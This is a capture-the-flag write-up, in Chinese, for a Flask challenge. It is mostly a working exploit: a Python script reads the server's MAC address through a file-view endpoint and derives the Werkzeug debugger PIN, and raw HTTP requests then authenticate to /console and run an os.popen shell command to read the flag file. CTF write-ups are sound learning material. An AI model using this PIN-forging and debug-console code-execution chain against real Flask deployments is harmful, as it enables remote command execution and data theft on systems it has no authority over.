My Flask App

flask算pin,127.0.0.1访问/console

exp.py

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
import hashlib
import requests
from itertools import chain

# 可能是公开的信息部分
probably_public_bits = [
    'nobody',
    'flask.app',
    'Flask',
    '/usr/local/lib/python3.11/site-packages/flask/app.py'
]

url = "https://my-flask-app-bblym7vig6to.chals.sekai.team:1337" + "/view?filename=/sys/class/net/eth0/address"
res = requests.get(url=url)
mac = res.text.strip().replace(':','')
mac = str(int(mac, 16))
print("mac:",mac)


# 私有信息部分
private_bits = [
    mac,
    'd012874f-9e09-499b-b531-f5fc6ecffb27'
]

# 创建哈希对象
h = hashlib.sha1()

# 迭代可能公开和私有的信息进行哈希计算
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)

# 加盐处理
h.update(b'cookiesalt')

# 生成 cookie 名称
cookie_name = '__wzd' + h.hexdigest()[:20]
print("cookie_name:"+cookie_name)

# 生成 pin 码
num = None
if num is None:
    h.update(b'pinsalt')
    num = ('%09d' % int(h.hexdigest(), 16))[:9]

# 格式化 pin 码
rv = None
if rv is None:
    for group_size in 5, 4, 3:
        if len(num) % group_size == 0:
            rv = '-'.join(num[x:x + group_size].rjust(group_size, '0')
                          for x in range(0, len(num), group_size))
            break
    else:
        rv = num

print("pin码:"+rv)

先访问console获取secret即s的值,注意大于​Werkzeug==3.0.3​版本仅支持回环地址127.0.0.1访问/console

1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /console HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://my-flask-app-ddnmc8xe9cys.chals.sekai.team:1337/console
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: close

然后验证pin码

1
2
3
4
5
6
7
8
9
10
11
12
13
14
GET /console?__debugger__=yes&cmd=pinauth&pin=103-661-276&s=K49SO3GSyRAVoQetGKS2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://my-flask-app-7deu3qmoe9gv.chals.sekai.team:1337/console
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Te: trailers
Connection: close

拿到cookie后,执行命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
GET /console?__debugger__=yes&cmd=import+os;os.popen('cat+/flag-oS6zdY6caEgZEbNkZTKERMSR0VTnnC4V.txt').read()&frm=0&s=K49SO3GSyRAVoQetGKS2 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:141.0) Gecko/20100101 Firefox/141.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Referer: https://my-flask-app-zinpxug7ji6c.chals.sekai.team:1337/console
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=0
Cookie: __wzd2a7b40dec13bd32ef9ad=1755410731|39fdced07be2
Te: trailers
Connection: close